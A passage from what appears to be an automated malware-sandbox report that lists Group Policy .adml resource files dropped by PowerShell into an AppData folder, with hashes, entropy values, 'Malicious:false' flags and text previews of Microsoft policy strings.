                                                                                          SSDEEP:96:LeD5pmUes8vc8gDcwFalisWNFIXwN30M5vYFV:Etes8vc8gowUAvIXwN30M5vYn
                                                                                          MD5:1C00F0E54B646BACA8571FC0B7BE9582
                                                                                          SHA1:0494D0849B95970D96E480C9B00C3694E4D50029
                                                                                          SHA-256:625371BBA40530A9A4A88E167B4870634F7583BB601D16954ED8FF4A0E5242E9
                                                                                          SHA-512:99A2B51A6ADDF470B15DFDC2D3D32CA305113C427CDF7C3B85FD3BD43F17B989B5BEA38BA78821DA5A8978437DD3E484CCB283D9B01B737C05C4B7D82288D749
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CredUI">Credential User Interface</string>.. <string id="CredUI_Help">Contains settings to control the behavior of credential collection.</string>.. <string id="EnumerateAdministrators">Enumerate administrator accounts on elevation</string>.. <string id="EnumerateAdministrators_Help">This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. By default, administrator accounts are not displayed when the user attempts to elevate a ru

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CredentialProviders.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (479), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5460
                                                                                          Entropy (8bit):4.757258895669925
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmAznn5XkKkcx1ftU6beY3rqFimzWSsdK/l+3yY8V:Ejznn5XkJcx1fdPrqFOXU/loyb
                                                                                          MD5:B735FF00BD6511F0525C74881042CFBF
                                                                                          SHA1:F9540A99E5654EA5F6B7AAF49CE35F591CEC2863
                                                                                          SHA-256:FF1B853B846EA63064AD460B42C44230DE008297B6A2DDB8DAA48991A5684C14
                                                                                          SHA-512:A585AE89C4B13A6A2DE50D414069FE40D3DB53395A4E79B5865B530ACC6963B2C89647D2735B27229503B58BAC47B4C43B38E6E2BEB00B81EC6F1D76DB441C06
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DefaultLogonDomain">Assign a default domain for logon</string>.. <string id="DefaultLogonDomain_Help">This policy setting specifies a default logon domain, which might be a different domain than the domain to which the computer is joined. Without this policy setting, at logon, if a user does not specify a domain for logon, the domain to which the computer belongs is assumed as the default domain. For example if the computer belongs to the Fabrikam domain, the default domain for user logon is Fabrikam. ....If y

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CtrlAltDel.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (353), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3490
                                                                                          Entropy (8bit):4.799993012083926
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKwZJBaoC9DxBboMEBar+Nc456uFDPrJNBFiy4jyDznyHSMrmdzcFV:LeD5pm8ZJjQDxXONcOXNB9HyHbrvFV
                                                                                          MD5:8EB6CBECFCFB7FB15E453E235713F0D2
                                                                                          SHA1:37170BA6139BD471C4121ED7747E8C9544E64E4A
                                                                                          SHA-256:23EAF2144B343ACCE5EC33DFB0363BA5B53E1ED8F5E0557F7597F02C1A659B0C
                                                                                          SHA-512:F3B96C2721592E9C5CD8CAF20DACCAE170B46BDBBBD24D4A6D1ACC3CA3D10BFA9AC23DA2B5B3F9CF7D9F7918236C1C686918BB392595C634E97B56070AEDE007
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CADOptions">Ctrl+Alt+Del Options</string>.. <string id="DisableChangePassword">Remove Change Password</string>.. <string id="DisableChangePassword_Help">This policy setting prevents users from changing their Windows password on demand.....If you enable this policy setting, the 'Change Password' button on the Windows Security dialog box will not appear when you press Ctrl+Alt+Del.....However, users are still able to change their password when prompted by the system. The system prompts users for a new pass

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DCOM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (507), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5072
                                                                                          Entropy (8bit):4.789995597871682
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmc4qzQuQ+kCO+QW9JvqIiErBAqHPkGitHqEJw2mL8ykL3/NBV:El4qE9+kCOtW9dqIiErBAgPk/tKEJw2D
                                                                                          MD5:7DF9E61D5F72660A48741A9D1AE6DF2A
                                                                                          SHA1:A623BD2021EAA8863519E110E2C4D141D68E6DEE
                                                                                          SHA-256:BD0E69BF353115E23B4344875DA15DF78BD4ADF676EEAB35AED30A21C129EBED
                                                                                          SHA-512:726FC2BD5444E1791811C9F39B3B535D155AA0BA2AC8B50F7A8B6FAF48E7BEDBD542C96C701A1CD58B1C89B89DA04D9C175E9CCDE70DA27C92E073E570138DD1
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DCOM">Distributed COM</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList">Allow local activation security check exemptions</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList_Explain">Allows you to specify that local computer administrators can supplement the "Define Activation Security Check exemptions" list.....If you enable this policy setting, and DCOM does not find an explicit entry for a DCOM server application id (appid) in the "Define Activation Security Check exemptions

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DFS.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1550
                                                                                          Entropy (8bit):4.934966284712348
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yAyjP9jlFxUy3QviR0IhjV:cgeD5x8gm8fK0jlFxUM7FV
                                                                                          MD5:59649458234FA8EC0FA1CCF6D1A1F000
                                                                                          SHA1:FA84DC8C633AC66D93C2CC4CA82973690CC01B06
                                                                                          SHA-256:7C621BDFA9AAFBB72C6E3EAA6BD9DADB9B87B76FF3085C3AB85F94A4BA74148B
                                                                                          SHA-512:3DAC7345CDF6E474EC6550890D2581E97CECCBDF3D6DA446D0B4051600B81E66725E20E3905FC8ED051E00AE74B7899ECEC073C828E776FB664731218F88E528
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DFSDiscoverDC">Configure how often a DFS client discovers domain controllers</string>.. <string id="DFSDiscoverDC_Help">This policy setting allows you to configure how often a Distributed File System (DFS) client attempts to discover domain controllers on a network. By default, a DFS client attempts to discover domain controllers every 15 minutes.....If you enable this policy setting, you can configure how often a DFS client attempts to discover domain controllers. This value is specified in minutes.....If you

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DWM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4823
                                                                                          Entropy (8bit):4.829103521253636
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm8i9yPYwH70day2JGkA5mZAOtfMtlV:E1i9Yn0zMA3G6
                                                                                          MD5:8C0C1F2AC3237B8AA71F88A5650C0E68
                                                                                          SHA1:8A39FC535339841CC7573B1DCFF729CEC8E54114
                                                                                          SHA-256:844BF77E54E0C353537B0D1349F0173049DD36C0CB64EAEE900663CD0A227AB4
                                                                                          SHA-512:C6F8AC395D011EC45EBF47812EBEBF7E152DB6A943566B744AA83B22529DF07E3D0749D008B5F3A8A46953CCCF39305966869E5EFE502B1E727CF55ED7A05F4F
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CAT_DesktopWindowManager">Desktop Window Manager</string>.. <string id="CAT_DesktopWindowManagerColorization">Window Frame Coloring</string>.. <string id="DwmDefaultColorizationColor">Specify a default color</string>.. <string id="DwmDefaultColorizationColorExplain">This policy setting controls the default color for window frames when the user does not specify a color. ....If you enable this policy setting and specify a default color, this color is used in glass window frames, if the user does not sp

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Desktop.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):22651
                                                                                          Entropy (8bit):4.740040645096249
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:sHlNSiouVHqVHdjZjfYBi1lkmX15/5GYyr2cci:qNSiVs9jBwBiHk0v/5Grrh
                                                                                          MD5:3B0954050C6DFF90CAE771936C61F536
                                                                                          SHA1:5D6D1097DE13011B78271272B87DE55C2BFFCEA8
                                                                                          SHA-256:F8DA2C6952EBABA7C70F5BB5941532A2E6112955E3E340F003581E96BB7B0881
                                                                                          SHA-512:097C9E8A0B5BC0B97777F6A591E7CEF5A2362668B05C42624593069FD4F2E6279EA8D83CBCADA7C973E9E1CCED78B1149889A333021FA904A23BF0D6FBEC06FC
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDesktop">Desktop</string>.. <string id="ActiveDirectory">Active Directory</string>.. <string id="AD_EnableFilter">Enable filter in Find dialog box</string>.. <string id="AD_EnableFilter_Help">Displays the filter bar above the results of an Active Directory search. The filter bar consists of buttons for applying additional filters to search results.....If you enable this setting, the filter bar appears when the Active Directory Find dialog box opens, but users can hide it.....If you disable this

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DeviceCompat.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1012
                                                                                          Entropy (8bit):5.014566400985145
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yFMNWe2PEYLdFV:cgeD5x8gm8fKOE+FV
                                                                                          MD5:8C5BFC23602CF18E6EC73BDF468C5C65
                                                                                          SHA1:87C49103ECB11F3284DE1311D305CE426DA77573
                                                                                          SHA-256:5FE3FC627DFAEDDEDDD5C617D4DDD1AB367353A97026268C27AB45B8A9025472
                                                                                          SHA-512:ED4BF6B6D7F2F5B248DF14DAA85551613583E8DCFD734266E08296F0DCB52055A2CAD56C23DDFA20EA3315A9DD3B3D538EE673C89E97CFC8D5D9BE39BB575794
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceCompat">Device and Driver Compatibility</string>.. <string id="DeviceFlags">Device compatibility settings</string>.. <string id="DriverShims">Driver compatibility settings</string>.. <string id="DeviceFlags_Help">Changes behavior of Microsoft bus drivers to work with specific devices.</string>.. <string id="DriverShims_Help">Changes behavior of 3rd-party drivers to work around incompatibilities introduced between OS versions.</string>.. </stringTable>.. </resources>..</policyDefinition

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DeviceInstallation.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (671), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):20516
                                                                                          Entropy (8bit):4.656487634133671
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:/Zy2dT4b3O+5KeqO+cpm964BNLKsuV2r4tFHsAvRzw3g:/ZBub+EKebxpm97ODVy4rHb5EQ
                                                                                          MD5:B0D80E37838946A958789511D6090800
                                                                                          SHA1:E80EBC94D870B40E9925D9473E83438287A3DF50
                                                                                          SHA-256:EAD0368B0AB7404ADDC0B8BD016E04D43C7A1E370A2875A6785863A53CC94095
                                                                                          SHA-512:A13D7AA56FA39803B8CB441DD6907A0F06E2B89EB478B6C6D57687F0E154DE44EF959411627C33D5652D096E439F6518C624A4F159189C8DA7AD51370FB12AD3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_AllowAdminInstall">Allow administrators to override Device Installation Restriction policies</string>.. <string id="DeviceInstall_AllowAdminInstall_Help">This policy setting allows you to determine whether members of the Administrators group can install and update the drivers for any device, regardless of other policy settings.....If you enable this policy setting, members of the Administrators group can use the Add Hardware wizard or the Update Driver wizard to install and update the drivers for

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DeviceSetup.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8722
                                                                                          Entropy (8bit):4.755555827203055
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm90hTxQOL2iYoQkdN+Rn+kJu+G6f9Yh3VfPtvCchfvaCz+51qMnHV:EbTmUvQkdN+F+au+G6etntbz+5su
                                                                                          MD5:9E7C326DCCFD5BDAE53F0FF7359042CF
                                                                                          SHA1:BFC33D23A42406EF057AC21BCECA4310C256C901
                                                                                          SHA-256:4E1BC9FDA548EEBF29A499B61CE0462983DD461DB84F4B2C63150636B917036B
                                                                                          SHA-512:96C937F5F6871D7BD0F3FDF0B6D502232C29C6E77DE7B1FD0A79DB4ADBC7EAAFBC0A60C76C8AF6D5D85CA7397A4C995BE385320C64D23076A7658C1B1187A624
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_BalloonTips">Turn off "Found New Hardware" balloons during device installation</string>.. <string id="DeviceInstall_BalloonTips_Help">This policy setting allows you to turn off "Found New Hardware" balloons during device installation.....If you enable this policy setting, "Found New Hardware" balloons do not appear while a device is being installed.....If you disable or do not configure this policy setting, "Found New Hardware" balloons appear while a device is being installed, unless the driver

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DigitalLocker.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1186
                                                                                          Entropy (8bit):5.006514157459994
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEgDfJvRl9xCRMRq9MXJz1c2igRE3RwMwFxRjX/5Ron:cgeD5x8gm8fKqTtW9M71ibKMFV
                                                                                          MD5:A4EECA9FC18FD2F595ECC98FD40E0F5F
                                                                                          SHA1:EFBAB95F94C418BE4B025F3CA14BA3441C1D7CE8
                                                                                          SHA-256:348B0A60BCA267759CA52611C67B06AB3347CAB23786C257D984EB7F3F94C6A2
                                                                                          SHA-512:11A2FB546E64CA105CE63E313FCDDE0950939C5981BEEC4D04CEB0C0C43EB573CC3C5444E71BBD12AD04A902CB4D3FC7C41EB4E9BA601232041716CEE0835622
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Digitalx_DiableApplication_TitleText">Do not allow Digital Locker to run</string>.. <string id="Digitalx_DisableApplication_DescriptionText">Specifies whether Digital Locker can run.....Digital Locker is a dedicated download manager associated with Windows Marketplace and a feature of Windows that can be used to manage and download products acquired and stored in the user's Windows Marketplace Digital Locker.....If you enable this setting, Digital Locker will not run.....If you disable or do not configure this

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DiskDiagnostic.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (349), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4016
                                                                                          Entropy (8bit):4.799918196062888
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmNIlyc4TNq1nCsXGT1fnC7SqnBU+l4vnjzyJ1nCsXGT1fnWmoV:EeIlyc4TN0psngSUG+l4vnjzy3psnWP
                                                                                          MD5:98FB5567E5194E5E7430C553FD07EE50
                                                                                          SHA1:9CD9DE9B3E9FAD928DCBB73225B7F77B21D7F532
                                                                                          SHA-256:3EE2D33B8C14490D4315F669873B1E4747EF4C99CF83CB3214FBE02774DF322D
                                                                                          SHA-512:2DC8749CB1E401E4A7753933861081D80AB9D11D349730289E36FD59EF3F76CFCE63AC71864B7239C05CFAD12F89D7991F1AA79E78751F926A941F82EADD23C3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. BEGIN: Custom supportedOn strings -->.. <string id="SUPPORTED_WindowsLonghornServerDesktopExperienceOrVista">.. Windows Server 2008 with Desktop Experience installed or Windows Vista.. </string>.. END: Custom supportedOn strings -->.. <string id="DfdAlertPolicy">Disk Diagnostic: Configure custom alert text</string>.. <string id="DfdAlertPolicyExplain">This policy setting substitutes custom alert text in the disk diagnostic message shown to users when a disk reports a S.M.A.R.T. f

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DiskNVCache.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4247
                                                                                          Entropy (8bit):4.68691343915682
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm+vfC9KJ5V/MztbEUiTKD48mRCjme9E5J9eWFV:EJN/MdEUiTKs8mwM8Wn
                                                                                          MD5:74FF3350EF82B0E11EF64C762CF28BE3
                                                                                          SHA1:8D7BB871CC583EB03E3E104FDC50FCBC974527EB
                                                                                          SHA-256:D94738C802A64BDA9CCA3947096A97B4DAC05730BD55441ED552595422103A9F
                                                                                          SHA-512:0729601AD1E861F7DA3E39ECC3878A37AFA3E37C92924446B28FA6BDFB4189D024B7F4E5CE0BF29FE4EB3B51DFA98FE07B7A560DDC521FBDAB4E50EA6C6160C2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootResumePolicy">Turn off boot and resume optimizations</string>.. <string id="BootResumePolicyHelp">This policy setting turns off the boot and resume optimizations for the hybrid hard disks in the system.....If you enable this policy setting, the system does not use the non-volatile (NV) cache to optimize boot and resume.....If you disable this policy setting, the system uses the NV cache to achieve faster boot and resume. The system determines the data that will be stored in the NV cache to optimize boot an

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DiskQuota.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (382), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):9312
                                                                                          Entropy (8bit):4.685669628790155
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmUA7x7OOWbm7kiE7EC/8GxKU0zOZqIc5fKSuBGfvbKqbKJajDrSy5G+YGmI:EOpKz98U0CgfKSFnWqBXrjksmw03Tja
                                                                                          MD5:40CA6688DCC63C37ADC92B8CE44A47E1
                                                                                          SHA1:584E5E4433F642B09081A68167436F41D3615867
                                                                                          SHA-256:9EA35D39FAB49421022E213BE5B8A66404B41BEB2202E17C94BF557FB8C349C4
                                                                                          SHA-512:7711A24BE790431495051BAE7DA407FA961748374C0936CB49FD4F421425C4D92458C5F8E2C356E70923EB91D0DE100D6EB7F401D2EF03A18DD590F7FEF8314A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DiskQuota">Disk Quotas</string>.. <string id="DQ_Enable">Enable disk quotas</string>.. <string id="DQ_Enable_Help">This policy setting turns on and turns off disk quota management on all NTFS volumes of the computer, and prevents users from changing the setting.....If you enable this policy setting, disk quota management is turned on, and users cannot turn it off.....If you disable the policy setting, disk quota management is turned off, and users cannot turn it on.....If this policy setting is not config

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DistributedLinkTracking.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (575), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1218
                                                                                          Entropy (8bit):4.961559763430255
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQJmjI7JMHkJNMLsDe7MBMZc1zcqoFV:cgeD5x8gm8fKxmEPnMLkeKMokFV
                                                                                          MD5:8B49ABCA606DF290D14944330F11A796
                                                                                          SHA1:5FD7496C8553485972A7B35E75386A0CB98199AF
                                                                                          SHA-256:25D3882376CC864E14BF8CBD16065971C8C5F1C88FCEF7C60B4213604F893272
                                                                                          SHA-512:F7C3B0CE37F00F281DCDF46A421295D2CD79298852B2302624CD4AFD27EED160FFB4B9003C2096851DD884E8708000282D55876CFC1FA853DCB437FA65D3F8F3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DLT_AllowDomainMode">Allow Distributed Link Tracking clients to use domain resources</string>.. <string id="DLT_AllowDomainMode_Explain">Specifies that Distributed Link Tracking clients in this domain may use the Distributed Link Tracking (DLT) server, which runs on domain controllers. The DLT client enables programs to track linked files that are moved within an NTFS volume, to another NTFS volume on the same computer, or to an NTFS volume on another computer. The DLT client can more reliably track links

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DnsClient.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (896), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):31344
                                                                                          Entropy (8bit):4.717542963262439
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:zlbkZcHOReR932i5D5Zbng2C5stOeoXYaYENfOenLtWeoXYaYENfwleyLLhbxEHq:u5XYlXYfleQlnzmW
                                                                                          MD5:7B88F32185E7AEE9D215D367F531C628
                                                                                          SHA1:086E5D851CBD967E907A54539DA3DE95F2F53916
                                                                                          SHA-256:A60EA72F20C54DC7362CB26A10970B4BEDAC5E257E20317BD2CACA1E289DB08D
                                                                                          SHA-512:70CF1A3642D0C6D6866B713DE7A52857CB550C6490B8C62A9605BEFE3811525C3081DCE9DE9F881C361FE88694C256EB03EA168FD489BE9CB0AC48AE4F244BAE
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DNS_Client">DNS Client</string>.. <string id="DNS_Domain">Connection-specific DNS suffix</string>.. <string id="DNS_Domain_Help">Specifies a connection-specific DNS suffix. This policy setting supersedes local connection-specific DNS suffixes, and those configured using DHCP.....To use this policy setting, click Enabled, and then enter a string value representing the DNS suffix.....If you enable this policy setting, the DNS suffix that you enter will be applied to all network connections used by computers

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\EAIME.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
